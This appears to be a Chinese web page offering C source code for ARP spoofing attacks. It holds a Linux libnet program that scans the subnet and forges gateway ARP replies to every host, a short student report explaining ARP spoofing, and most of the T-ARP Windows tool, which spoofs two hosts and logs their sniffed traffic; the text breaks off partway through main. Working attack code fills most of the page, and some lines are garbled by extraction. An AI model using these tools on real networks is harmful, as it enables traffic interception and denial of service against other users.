C语言实现ARP攻击(附源码)

ARP欺骗攻击程序1.#include<stdio.h>2.#include<stdlib.h>3.#include<arpa/inet.h>4.#include<string.h>5.#include<linux/if_ether.h>6.#include<list.h>7.#include<libnet.h>8.#include<linux/netlink.h>9.#include<linux/rtnetlink.h>10.#include<sys/socket.h>11.#include<errno.h>12.#include<sys/time.h>13.#include<sys/ioctl.h>14.#include<getopt.h>15.#include<pthread.h>16.#include<net/if.h>17.#include<netinet/ether.h>18.#include<netpacket/packet.h>19.20.#ifdef DEBUG21.#define DEBUGP(format,args...)fprintf(stdout,format, ##args)22.#else23.#define DEBUGP(format,args...)24.#endif25.26.27.static struct option opts[]= {28.{.name="interface",.has_arg = 1,.val ='i'},29.{.name="help",.has_arg = 0,.val ='h'},30.{NULL}31.};32.33.typedef struct _send_info {34.char dev[6];35.u_int8_t smac[ETH_ALEN];36.u_int8_t dmac[ETH_ALEN];37.u_int32_t sip;38.u_int32_t dip;39.}send_info;40.41.struct arppacket {42.u_int16_t ar_hrd; /*硬件类型*/43.u_int16_t ar_pro; /*协议类型*/44.u_int8_t ar_hln; /*硬件地址长度*/45.u_int8_t ar_pln; /*协议地址长度*/46.u_int16_t ar_op; /*ARP操作码*/47.u_int8_t ar_sha[ETH_ALEN]; /*发送方MAC地址*/48.u_int32_t ar_sip; /*发送方IP地址*/49.u_int8_t ar_tha[ETH_ALEN]; /*目的MAC地址*/50.u_int32_t ar_tip; /*目的IP地址*/51.}__attribute__ ((packed));52.53.typedef struct mac_ip{54.struct list_head list;55.u_char mac_addr[6];56.u_int32_t ip_addr;57.}mac_ip_t;58.59.static void print_help(void) {60.printf("-h Print this help\n");61.printf("-i Ethernet name\n");62.exit(-1);63.}64.65.static int pthread_num;66.static pthread_t *pid;67.static struct list_head listhead;68.pthread_mutex_t mut;69.libnet_t *l;70.71.static int get_local_mac_ip_mask (const char *device, u_int8_t* mac,72.u_int32_t *ip, u_int32_t *mask) {73.int sockfd;74.struct ifreq req;75.struct sockaddr_in *sin;76.77.memset(&req, 0,sizeof(req));78.strcpy(req.ifr_name, device);79.req.ifr_addr.sa_family = PF_INET;80.81.if((sockfd = socket(PF_INET, SOCK_DGRAM, 0))< 0) {82.fprintf(stderr,"Sock Error:%s\n", strerror(errno));83.return -1;84.}85.86./*获取指定网卡的MAC地址*/87.if(ioctl(sockfd, SIOCGIFHWADDR,(char *)&req)< 0) {88.fprintf(stderr,"ioctl SIOCGIFHWADDR:%s\n", strerror(errno));89.close(sockfd);90.return -2;91.} else {92.memcpy(mac, req.ifr_hwaddr.sa_data, ETH_ALEN);93.}94.95./*获取指定网卡的IP地址*/96.if(ioctl(sockfd, SIOCGIFADDR,(char *)&req)< 0) {97.fprintf(stderr,"ioctl SIOCGIFADDR:%s\n", strerror(errno));98.close (sockfd);99.return -3;100.} else {101.sin =(struct sockaddr_in *)&req.ifr_addr;102.memcpy(ip,(char *)&sin->sin_addr, 4);103.}104.105./*获取指定网卡的子网掩码*/106.if(ioctl(sockfd, SIOCGIFNETMASK,(char *)&req)< 0) { 107.fprintf(stderr,"ioctl SIOCGIFADDR:%s\n", strerror(errno));108.close(sockfd);109.return -4;110.} else {111.sin =(struct sockaddr_in *)&req.ifr_addr;112.memcpy(mask,(char *)&sin->sin_addr, 4);113.}115.return 0;116.}117.118.static u_int8_t *print_mac(const u_int8_t *mac) { 119.static char buffer[6];120.memset (buffer, 0,sizeof(buffer));121.sprintf (buffer,"%02x:%02x:%02x:%02x:%02x:%02x", 122.mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); 123.return buffer;124.}125.126.static char *print_ip(const u_int32_t ip) {127.return inet_ntoa(*(struct in_addr *)&ip);128.}129.130.static int get_gw(u_int32_t *gw) {131.char s[255]= {0};132.char ss[9]= {0};133.FILE *fp;134.if((fp = fopen("/proc/net/route","r"))== NULL) { 135.printf("/proc/net/route open failure!\n");136.return -1;137.}138.fgets(s, 255, fp);139.fgets(s, 255, fp);140.sscanf(s,"%*s%*s%s",ss);141.sscanf(ss,"%x", gw);142.return 0;143.}145.static void set_subnet_broadcast(u_int32_t localip, u_int32_t mask,146.u_int32_t *subnet, u_int32_t *broadcast) {147./*计算子网地址和广播地址148.子网地址=主机地址和掩码的与运算149.广播地址=子网地址和掩码的同或运算150.由于C语言没有同或运算符,同或=异或取反*/151.*subnet = localip & mask;152.*broadcast = ~(*subnet ^ mask);153.}154.155.static send_info **slot_create(u_int32_t subnet, u_int32_t broadcast, char *cap_dev,156.u_int8_t *localmac, u_int32_t localip) {157.send_info **send_inf;158.int idx;159.u_int8_t tmpmac[]= {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};160.161.subnet = ntohl(subnet);162.broadcast = ntohl(broadcast);163.pthread_num = broadcast - subnet - 1;164.pid =(pthread_t *)malloc(sizeof(pthread_t)* pthread_num);165./*166.避免多线程访问统一结构体所造成不可预料的结果167.所以这里给n个线程动态分配n个结构体的内存空间168.用一个数组统一保存这些内存地址,最后统一释放169.*/170.send_inf = malloc(sizeof(send_info *)* pthread_num);171.if(!send_inf) return NULL;172.173.for(idx=0; idx<pthread_num; idx++) {174.send_inf[idx]=(send_info *)malloc(sizeof(send_info));175.if(!send_inf[idx]) return NULL;176.memset(send_inf[idx], 0,sizeof(send_info));177.strncpy(send_inf[idx]->dev, cap_dev, strlen(cap_dev));178.memcpy(send_inf[idx]->smac, localmac, ETH_ALEN);179.memcpy(send_inf[idx]->dmac, tmpmac, ETH_ALEN);180.send_inf[idx]->sip = localip;181.}182.183.return send_inf;184.}185.186.static void fill_ethhdr(const char *packet,const send_info *info) {187.struct ethhdr *p_ethhdr;188.189./*使p_ethhdr指向以太网帧的帧头*/190.p_ethhdr =(struct ethhdr *)packet;191./*复制目的以太网地址*/192.memcpy(p_ethhdr->h_dest, info->dmac, ETH_ALEN);193./*复制源以太网地址*/194.memcpy(p_ethhdr->h_source, info->smac, ETH_ALEN);195./*设置协议类型，以太网0x0806*/196.p_ethhdr->h_proto = htons(ETH_P_ARP);197.198.}199.200.static void fill_arphdr(const char *packet,const send_info *info) {201.struct arppacket *p_arp;202.u_int8_t t_mac[6]= {0x0, 0x0, 0x0, 0x0, 0x0, 0x0};203.204.p_arp =(struct arppacket *)(packet + ETH_HLEN); /*定位ARP包地址*/205.p_arp->ar_hrd =htons(0x0001); /*arp硬件类型,1表示以太网地址*/206.p_arp->ar_pro = htons(ETH_P_IP); /*协议类型 0x0800表示IP地址*/207.p_arp->ar_hln =ETH_ALEN; /*硬件地址长度即MAC地址长度为6字节*/208.p_arp->ar_pln = ETH_FCS_LEN;/*IP地址长度即为4字节*/209.p_arp->ar_op =htons(0x0001); /*操作方式1为ARP 请求*/210./*发送方MAC地址*/211.memcpy(p_arp->ar_sha, info->smac, ETH_ALEN);212./*发送方IP地址*/213.p_arp->ar_sip = info->sip;214./*接收方MAC地址ARP请求以太网首部中目的地址为全FF, ARP首部中目标MAC为全00*/215.memcpy(p_arp->ar_tha, t_mac, ETH_ALEN);216./*接收方IP地址*/217.p_arp->ar_tip = info->dip;218.}219.220.static int get_iface_index(int fd,const char* interface_name) {221.struct ifreq ifr;222.memset(&ifr, 0,sizeof(ifr));223.strcpy(ifr.ifr_name, interface_name);224.if(ioctl(fd, SIOCGIFINDEX, &ifr)==-1)225.return -1;226.return ifr.ifr_ifindex;227.}228.229.static int send_arp_request(int fd,const char *packet, int length,230.struct sockaddr *addr,int len) {231.if(sendto(fd, packet,length, 0,addr, len)< 0)232.return -1;233.return 0;234.}235.236.static int add_mac_ip(const char *mac, const u_int32_t ip) {237.struct mac_ip *h;238.h =(struct mac_ip *)malloc(sizeof(mac_ip_t));239.if(!h) return -1;240.INIT_LIST_HEAD(&h->list);241.memcpy(h->mac_addr, mac, 6);242.h->ip_addr =ip;243.pthread_mutex_lock(&mut);244.list_add_tail(&h->list, &listhead);245.pthread_mutex_unlock(&mut);246.return 0;247.}248.249.static void *send_rev(const send_info *info) {250.char packet[42]; /*以太帧缓冲区 14+28 */251.int fd, n, i;252.u_int8_t buffer[128];253.struct sockaddr_ll addr;254.int len =sizeof(addr);255.int optval =1 ;256.struct ethhdr *p_ethhdr;257.struct arppacket *p_arp;258.259.memset(packet, 0,sizeof(packet));260.memset(buffer, 0,sizeof(buffer));261.memset(&addr, 0,sizeof(addr));262.263.fill_ethhdr(packet, info);264.265.fill_arphdr(packet, info);266.267.#if 0268.p_arp =(struct arppacket *)(packet + ETH_HLEN); /*定位ARP包地址*/269.printf("Dst_IP: %s\n",inet_ntoa(*(struct in_addr *)&p_arp->ar_tip));270.#endif271.272.if((fd =socket(PF_PACKET,SOCK_RAW, htons(ETH_P_ARP)))< 0) {273.printf("socket init failure\n");274.exit(1);275.}277./*允许发送广播数据包*/278.if(setsockopt(fd,SOL_SOCKET,SO_BROADCAST, &optval,sizeof(optval))==-1) {279.printf("Could not setsocketopt on raw socket\n");280.close(fd);281.exit(2);282.}283.284.#if 1285./*设置非阻塞模式*/286.int flags;287.flags = fcntl(fd, F_GETFL, 0); /*先获取fd的状态*/288.fcntl(fd, F_SETFL, flags|O_NONBLOCK);289.#endif290.291.addr.sll_family = AF_PACKET;292.if((addr.sll_ifindex = get_iface_index(fd, info->dev))< 0) 293.return;294.addr.sll_protocol = htons(ETH_P_ARP);295.296./*发送3次arp请求包*/297.for(i=0; i<3; i++) {298.send_arp_request(fd,packet,sizeof(packet),(struct sockaddr *)&addr, len);299.}300.301.p_ethhdr =(struct ethhdr *)buffer;302.p_arp =(struct arppacket *)(buffer + ETH_HLEN);303.305.SOCK_RAW模式是会包含以太头部,所以会接收所有的数据包306.每个线程都会收到最多pthread_num个应答包,所以这里需要307.手动判断所收到的应答包是否是对应这个线程发出的308.*/309.for(i=0; i<pthread_num; i++) {310.n = recvfrom(fd, buffer,sizeof(buffer), 0, NULL, NULL);311.if(n > 0) {312.if(info->dip == p_arp->ar_sip) {313.DEBUGP("Receive IP:%-15s MAC:%s ETH_PROTO:0x%04x\n", print_ip(p_arp->ar_sip),314.print_mac(p_arp->ar_sha), ntohs(p_ethhdr->h_proto));315.add_mac_ip(p_arp->ar_sha, p_arp->ar_sip);316.break;317.}318.}leep(1000);320.}321.close(fd);322.323.pthread_exit(NULL);324.}325.326.static void thread_create(send_info**inf,u_int32_t subnet,327.u_int32_t broadcast) {328.u_int32_t addr,ret;329.int idx = 0;331.subnet = ntohl(subnet);332.broadcast = ntohl(broadcast);333.for(addr=subnet+1;addr<broadcast;addr++) {334.inf[idx]->dip = htonl(addr);335.ret= pthread_create(&pid[idx], NULL,(void *)send_rev, inf[idx++]);336.if(ret!= 0) printf("create the thread failure\n");337.}338./*等待线程结束*/339.for(idx=0; idx<pthread_num; idx++) {340.pthread_join(pid[idx], NULL);341.}342.}343.344.static void print_list(void) {345.mac_ip_t *h;346.mac_ip_t test;347.list_for_each_entry(h, &listhead, list) {348.test.ip_addr = h->ip_addr;349.memcpy(test.mac_addr, h->mac_addr, 6);350.printf("Target_IP: %-15s Target_MAC: %s\n", print_ip(test.ip_addr),351.print_mac(test.mac_addr));352.}353.}354.355.static void free_mem(send_info **pNode) {356.int i;357.for(i=0; i<pthread_num; i++) {358.free(pNode[i]);359.}360.free(pid);361.}362.363.static int send_arp_reply(const char *dev,const u_int32_t gateway,364.const mac_ip_t *target) {365.char device[6]= {0};366.u_int32_t dst_ip, src_ip;367.u_int8_t src_mac[6]={0x12,0x34,0x56,0x78,0x99, 0x99}; /*虚假的源MAC */368.u_int8_t dst_mac[6]= {0}; /*干扰的目标MAC */369.char error[LIBNET_ERRBUF_SIZE]; /*出错信息*/370.libnet_ptag_t arp_tag, eth_tag;371.372.strncpy(device, dev,sizeof(device)-1);373.374./*网络序的网关*/375.src_ip = gateway;376./*干扰的网络序目标IP */377.dst_ip = target->ip_addr;378./*干扰的目标MAC */379.memcpy(dst_mac, target->mac_addr, 6);380.381.if((l = libnet_init(LIBNET_LINK_ADV, device, error))== NULL) {382.printf("libnet_init: error [%s]\n", error);383.return -2;384.};385.386./*构造arp协议块*/387.arp_tag = libnet_build_arp(388.ARPHRD_ETHER, /*硬件类型,1表示以太网硬件地址*/389.ETHERTYPE_IP, /* 0x0800表示询问IP地址*/390.6, /*硬件地址长度*/391.4, /* IP地址长度*/392.ARPOP_REPLY, /*操作方式:ARP请求*/393.src_mac, /* source MAC addr*/394.(u_int8_t *)&src_ip, /* src proto addr*/395.dst_mac, /* dst MAC addr*/396.(u_int8_t *)&dst_ip, /* dst IP addr*/397.NULL, /* no payload */398.0, /* payload length*/399.l, /* libnet tag */400.0 /* Create new one */);401.if(arp_tag ==-1) {402.printf("build IP failure\n");403.return -3;404.}405.406./*构造一个以太网协议块407.You should only use this function when408.libnet is initialized with the LIBNET_LINK interface.*/409.eth_tag = libnet_build_ethernet(410.dst_mac, /*以太网目的地址*/411.src_mac, /*以太网源地址*/412.ETHERTYPE_ARP, /*以太网上层协议类型，此时为ARP请求*/413.NULL, /*负载，这里为空*/414.0, /*负载大小*/415.l, /* Libnet句柄*/416.0 /*协议块标记，0表示构造一个新的*/417.);418.if(eth_tag ==-1) {419.printf("build eth_header failure\n");420.return -4;421.}422.423.libnet_write(l);424.425.return 0;426.}427.428.static void arp_attack(const char *dev, const u_int32_t gateway) {429.mac_ip_t *s;430.printf("\nStarting attack...\nPress Ctrl^C to abort!\n");431.while(1) {432.list_for_each_entry(s, &listhead, list) {433.if(send_arp_reply(dev, gateway, s)== 0)434.libnet_destroy(l);435.}leep(500000);437.}438.}439.440.static void clean_list(void)441.{442.mac_ip_t *h,*htmp;443.if(list_empty(&listhead)) return;444.list_for_each_entry_safe(h, htmp, &listhead, list) {445.list_del(&h->list);446.free(h);447.}448.}449.450.int main(int argc, char **argv) {451.char c;452.char *cap_dev = NULL;453.u_int8_t localmac[ETH_ALEN];454.u_int32_t localip,mask, gateway, subnet, broadcast;455.send_info **send_slot;456.opterr = 0;457.458.while((c = getopt_long(argc, argv,"hi:", opts, NULL))!= -1) {459.switch(c) {460.case '?':461.fprintf(stderr,"Bad Options\n");462.exit(-1);463.case 'h':464.print_help();465.break;466.case 'i':467.cap_dev = optarg;468.break;469.}470.}471.472.if(!cap_dev) print_help();473.474./*获取本机的IP地址 MAC地址子网掩码*/475.if(get_local_mac_ip_mask(cap_dev, localmac,476.&localip, &mask)!= 0) {477.printf("Get local mac and ip failure!\n");478.exit(-2);479.}480.481./*设置网络号和广播地址*/482.set_subnet_broadcast(localip,mask,&subnet, &broadcast);483.484./*获取主机网关地址*/485.if(get_gw(&gateway)!= 0) {486.printf("Get gateway failure\n");487.exit(-3);488.}489.490.DEBUGP("Capturing from %s\n", cap_dev);491.DEBUGP("IP=%s\n", print_ip(localip));492.DEBUGP("Mask=%s\n", print_ip(mask));493.DEBUGP("MAC=%s\n", print_mac(localmac));494.DEBUGP("GW=%s\n", print_ip(gateway));495.DEBUGP("Subnet=%s\n", print_ip(subnet));496.DEBUGP("Broadcast=%s\n", print_ip(broadcast));497.498./*为每个线程分配访问的空间和槽位*/499.if((send_slot = slot_create(subnet, broadcast, cap_dev, 500.localmac, localip))== NULL) {501.printf("slot create error\n");502.exit(-4);503.}504.505./*初始化链表*/506.INIT_LIST_HEAD(&listhead);507.508./*创建多线程*/509.thread_create(send_slot, subnet, broadcast); 510.511./*调试打印list成员信息*/512.print_list();513.514./*释放多线程结构体*/515.free_mem(send_slot);516.517.#if 0518./*开始攻击*/519.arp_attack(cap_dev, gateway);520.#endif521.522.clean_list();523.524.return 0;525.}list.rar(头文件解压后放置/usr/local/include/目录下)如果没有安装libnet库的话, 运行apt-get install libnet-dev。

信息安全原理——ARP攻击班级：07计算机1班姓名：胡益铭学号：E07620112ARP原理：ARP，即地址解析协议，实现通过IP地址得知其物理地址。

在TCP/IP网络环境下，每个主机都分配了一个32位的IP地址，这种互联网地址是在网际范围标识主机的一种逻辑地址。

为了让报文在物理网路上传送，必须知道对方目的主机的物理地址。

这样就存在把IP 地址变换成物理地址的地址转换问题。

以以太网环境为例，为了正确地向目的主机传送报文，必须把目的主机的32位IP地址转换成为48位以太网的地址。

这就需要在互连层有一组服务将IP地址转换为相应物理地址，这组协议就是ARP协议。

ARP数据报格式如下：什么是ARP欺骗：其实，此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。

ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首，是网吧老板和网管员的心腹大患。

从影响网络连接通畅的方式来看，ARP欺骗分为二种，一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据。

它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址，造成正常PC无法收到信息。

第二种ARP欺骗的原理是——伪造网关。

它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。

在PC看来，就是上不了网了，“网络掉线了”。

本程序基于C语言，利用winpacp实现往局域网内发自定义的包，以达到ARP欺骗的目的。

首先从/archive/下载4.0beta1-WpdPack和4.0beta1-WinPcap.exe，版本很多，不过最新版本需要64位的系统，本人32位系统用不了。

直接点击4.0beta1-WinPcap.exe安装，然后在C:\Program Files\WinPcap下打开rpcapd.exe 服务。

T-ARP欺骗源程序代码C#include "packet32.h"#include "ntddndis.h"#include <stdio.h>#include <conio.h>#pragma comment(lib,"ws2_32") #pragma comment(lib,"packet")#define ETH_IP 0x0800#define ETH_ARP 0x0806 #define ARP_REQUEST 0x0001 #define ARP_REPLY 0x0002 #define ARP_HARDW ARE 0x0001 #define max_num_adapter 10#pragma pack(push,1)typedef struct ethdr{unsigned char eh_dst[6];unsigned char eh_src[6];unsigned short eh_type;}ETHDR,*PETHDR;typedef struct arphdr{unsigned short arp_hdr;unsigned short arp_pro;unsigned char arp_hln;unsigned char arp_pln;unsigned short arp_opt;unsigned char arp_sha[6];unsigned long arp_spa;unsigned char arp_tha[6];unsigned long arp_tpa;}ARPHDR,*PARPHDR;typedef struct iphdr{unsigned char h_lenver;unsigned char tos;unsigned short total_len;unsigned short ident;unsigned short frag_and_flags;unsigned char ttl;unsigned char proto;unsigned short checksum;unsigned int sourceip;unsigned int destip;}IPHDR,*PIPHDR;#pragma pack(push)LPADAPTER lpadapter=0;LPPACKET lppacketr,lppackets;ULONG myip,firstip,secondip;UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0}; BOOL mm=FALSE,fm=FALSE,sm=FALSE; FILE *fp;char adapterlist[max_num_adapter][1024];char msg[50];int num=0;void start(){printf("T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n");printf("Homepage: \n");printf("E-mail: TOo2y@\n");return ;}void usage(){printf("\nUsage: T-ARP [-m|-a|-s|-r] firstip secondip \n\n");printf("Option:\n");printf(" -m mac Get the mac address from firstip to secondip\n");printf(" -a antisniff Get the sniffing host from firstip to secondip\n");printf(" -s spoof 1> Spoof the host between firstip and secondip\n");printf(" sniff 2> Sniff if firstip == secondip == your own ip\n");printf(" shock 3> Shock if firstip == secondip != your own ip\n");printf(" -r reset Reset the spoofed host worknormally\n\n");printf("Attention:\n");printf(" 1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");printf(" 2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\T cpip\\Parameters\\IPEnableRouter==0x1\n\n");return ;}int getmine(){char sendbuf[1024];int k;ETHDR eth;ARPHDR arp;for(k=0;k<6;k++){eth.eh_dst[k]=0xff;eth.eh_src[k]=0x82;arp.arp_sha[k]=0x82;arp.arp_tha[k]=0x00;}eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDW ARE);arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REQUEST);arp.arp_tpa=htonl(myip);arp.arp_spa=inet_addr("112.112.112.112");memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,&eth,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket in getmine Error: %d\n",GetLastError());return -1;}return 0;}void getdata(LPPACKET lp,int op){ULONG ulbytesreceived,off,tlen,ulen,ulLines;ULONG j,k;ETHDR *eth;ARPHDR *arp;PIPHDR ip;char *buf,*pChar,*pLine,*base;struct bpf_hdr *hdr;struct sockaddr_in sin;ulbytesreceived=lp->ulBytesReceived;buf=(char *)lp->Buffer;off=0;while(off<ulbytesreceived){if(kbhit()){return ;}hdr=(struct bpf_hdr *)(buf+off);off+=hdr->bh_hdrlen;pChar=(char *)(buf+off);base=pChar;off=Packet_WORDALIGN(off+hdr->bh_caplen);eth=(PETHDR)pChar;arp=(PARPHDR)(pChar+sizeof(ETHDR));if(eth->eh_type==htons(ETH_IP)){ip=(PIPHDR)(pChar+sizeof(ETHDR));if(fm && sm && (op==3)){if((((ip->sourceip!=htonl(myip)) && (ip->destip!=htonl(myip))&& !strcmp((char*)eth->eh_dst,(char *)mmac))&& ((ip->sourceip==htonl(firstip)) || (ip->destip==htonl(firstip))|| (ip->sourceip==htonl(secondip)) || (ip->destip==htonl(secondip))))|| ((firstip==myip) && (secondip==myip))){memset(msg,0,sizeof(msg));sin.sin_addr.s_addr=ip->sourceip;printf("[IP:]%16s ---> [IP:]",inet_ntoa(sin.sin_addr));strcpy(msg,inet_ntoa(sin.sin_addr));strcat(msg+15," ---> ");sin.sin_addr.s_addr=ip->destip;printf("%16s\n",inet_ntoa(sin.sin_addr));strcat(msg+23,inet_ntoa(sin.sin_addr));fseek(fp,-2,1);fwrite("\r\n\r\n\r\n",6,1,fp);fwrite(msg,38,1,fp);fwrite("\r\n",2,1,fp);ulLines=(hdr->bh_caplen+15)/16;for(k=0;k<ulLines;k++){pLine=pChar;printf("%08lx : ",pChar-base);ulen=tlen;ulen=(ulen>16) ? 16 : ulen;tlen-=ulen;for(j=0;j<ulen;j++)printf("%02x ",*(BYTE *)pChar++);if(ulen<16)printf("%*s",(16-ulen)*3," ");pChar=pLine;for(j=0;j<ulen;j++,pChar++){printf("%c",isprint(*pChar)? *pChar : '.');fputc(isprint(*pChar) ? *pChar : '.',fp);}printf("\n");}printf("\n");fwrite("\r\n",2,1,fp);}}continue;}else if((eth->eh_type==htons(ETH_ARP)) && (arp->arp_opt==htons(ARP_REPLY))){sin.sin_addr.s_addr=arp->arp_spa;if(sin.sin_addr.s_addr==htonl(myip))memcpy(mmac,eth->eh_src,6);if(!mm){printf("\t");for(k=0;k<5;k++)printf("%.2x-",eth->eh_src[k]);printf("%.2x\n",eth->eh_src[5]);switch(op){case 1:printf("\n[MAC LIST:]");break;case 2:printf("\n[Sniffing Host:]");break;default:break;}}mm=TRUE;if((op==1) || (op==2)){printf("\n[IP:] %.16s [MAC:] ",inet_ntoa(sin.sin_addr));for(k=0;k<5;k++)printf("%.2x-",eth->eh_src[k]);printf("%.2x",eth->eh_src[5]);}else if(((op==3) || (op==4)) && (!fm || !sm)){if(arp->arp_spa==htonl(firstip)){memcpy(fmac,eth->eh_src,6);fm=TRUE;}if(arp->arp_spa==htonl(secondip)){memcpy(smac,eth->eh_src,6);sm=TRUE;}}}}return ;}DWORD WINAPI sniff(LPVOID no){int option=*(int *)no;char recvbuf[1024*250];if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOU S)==FALSE){printf("Warning: Unable to set the adapter to promiscuous mode\n");}if(PacketSetBuff(lpadapter,500*1024)==FALSE){printf("PacketSetBuff Error: %d\n",GetLastError());return -1;}if(PacketSetReadTimeout(lpadapter,1)==FALSE){printf("Warning: Unable to set the timeout\n");}if((lppacketr=PacketAllocatePacket())==FALSE){printf("PacketAllocatePacket receive Error: %d\n",GetLastError());return -1;}PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));while(!kbhit()){if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE){if(GetLastError()==6)return 0;printf("PacketReceivePacket Error: %d\n",GetLastError());return -1;}getdata(lppacketr,option);}return 0;}DWORD WINAPI sendMASR(LPVOID no){int fun=*(int *)no;int k,stimes;char sendbuf[1024];ETHDR eth;ARPHDR arp;if(fun<1 || fun>4){return -1;}else{for(k=0;k<6;k++){eth.eh_dst[k]=0xff;arp.arp_tha[k]=0x00;}if(fun==2)eth.eh_dst[5]=0xfe;}memcpy(eth.eh_src,mmac,6);eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDW ARE); arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REQUEST); arp.arp_spa=htonl(myip);memcpy(arp.arp_sha,mmac,6);if(fun==1 || fun==2)stimes=1;else if(fun==3 || fun==4)stimes=2;for(k=0;k<stimes;k++){if(stimes==1){arp.arp_tpa=htonl(firstip+(num++));}else if(stimes==2){switch(k){case 0:arp.arp_tpa=htonl(firstip);break;case 1:arp.arp_tpa=htonl(secondip);break;default:break;}}memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,&eth,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket in sendMASR Error: %d\n",GetLastError());return -1;}}return 0;}DWORD WINAPI sendSR(LPVOID no){int fun=*(int *)no;int j,k;char sendbuf[1024];struct sockaddr_in fsin,ssin;BOOL stimes=FALSE;ETHDR eth;ARPHDR arp;fsin.sin_addr.s_addr=htonl(firstip); ssin.sin_addr.s_addr=htonl(secondip);eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDW ARE); arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REPLY);if(fun==3){if(mm){if((firstip==myip) && (secondip==myip)){fm=TRUE;sm=TRUE;memcpy(fmac,mmac,6);memcpy(smac,mmac,6);}else if(!fm || !sm){printf("\nNot get enough data\n");return -1;}for(j=0;j<2;j++){if(j==0){printf("\nSpoofing %.16s : ",inet_ntoa(fsin.sin_addr));printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));}else if(j==1){printf("Spoofing %.16s : ",inet_ntoa(ssin.sin_addr));printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));}for(k=0;k<5;k++)printf("%.2x-",mmac[k]);printf("%.2x\n",mmac[5]);}printf("\ni will try to snoof ...\n\n");stimes=TRUE;}else{printf("\nNot get enough data\n");return -1;}}else if(fun==4){if(mm){if((firstip==myip) && (secondip==myip)){fm=TRUE;sm=TRUE;memcpy(fmac,mmac,6);memcpy(smac,mmac,6);}else if(!fm || !sm){printf("\nNot get enough data\n");return -1;}printf("\nReset %.16s : ",inet_ntoa(fsin.sin_addr));printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));for(k=0;k<5;k++)printf("%.2x-",smac[k]);printf("%.2x\n",smac[5]);printf("Reset %.16s : ",inet_ntoa(ssin.sin_addr));printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));for(k=0;k<5;k++)printf("%.2x-",fmac[k]);printf("%.2x\n\n",fmac[5]);stimes=FALSE;}else{printf("\nNot get enough data\n");return -1;}}elsereturn -1;do{memcpy(eth.eh_dst,fmac,6);memcpy(arp.arp_tha,fmac,6);arp.arp_tpa=htonl(firstip);arp.arp_spa=htonl(secondip);if(!stimes){memcpy(eth.eh_src,smac,6);memcpy(arp.arp_sha,smac,6);}else{memcpy(eth.eh_src,mmac,6);memcpy(arp.arp_sha,mmac,6);}memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,&eth,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp)); PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSetNumWrites(lpadapter,2)==FALSE){printf("Warning: Unable to send a packet 2 times\n");}if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket in SendSR Error: %d\n",GetLastError());return -1;}Sleep(1000);memcpy(eth.eh_dst,smac,6);memcpy(arp.arp_tha,smac,6);arp.arp_tpa=htonl(secondip);arp.arp_spa=htonl(firstip);if(!stimes){memcpy(eth.eh_src,fmac,6);memcpy(arp.arp_sha,fmac,6);}else{memcpy(eth.eh_src,mmac,6);memcpy(arp.arp_sha,mmac,6);}memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,&eth,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket int sendSR Error: %d\n",GetLastError());return -1;}Sleep(1000);}while(stimes);if(fun==4)printf("Reset Successfully");return 0;}int main(int argc,char *argv[]){HANDLE sthread,rthread;WCHAR adaptername[8192];WCHAR *name1,*name2;ULONG adapterlength;DWORD threadsid,threadrid;struct NetType ntype;struct bpf_stat stat;struct sockaddr_in sin;struct npf_if_addr ipbuff;int adapternum=0,opti=0,open,i,total;long npflen;system("cls.exe");start();if(argc!=4){usage();getche();return -1;}else{if(!strcmp(argv[1],"-m")){opti=1;}else if(!strcmp(argv[1],"-a")){opti=2;}else if(!strcmp(argv[1],"-s")){opti=3;if((fp=fopen("capture.txt","w+"))==NULL) {printf("Open capture.txt Error: %d\n");return -1;}else{fwrite("T-ARP Captrue Data",20,1,fp);}}else if(!strcmp(argv[1],"-r")){opti=4;}else{usage();getche();return 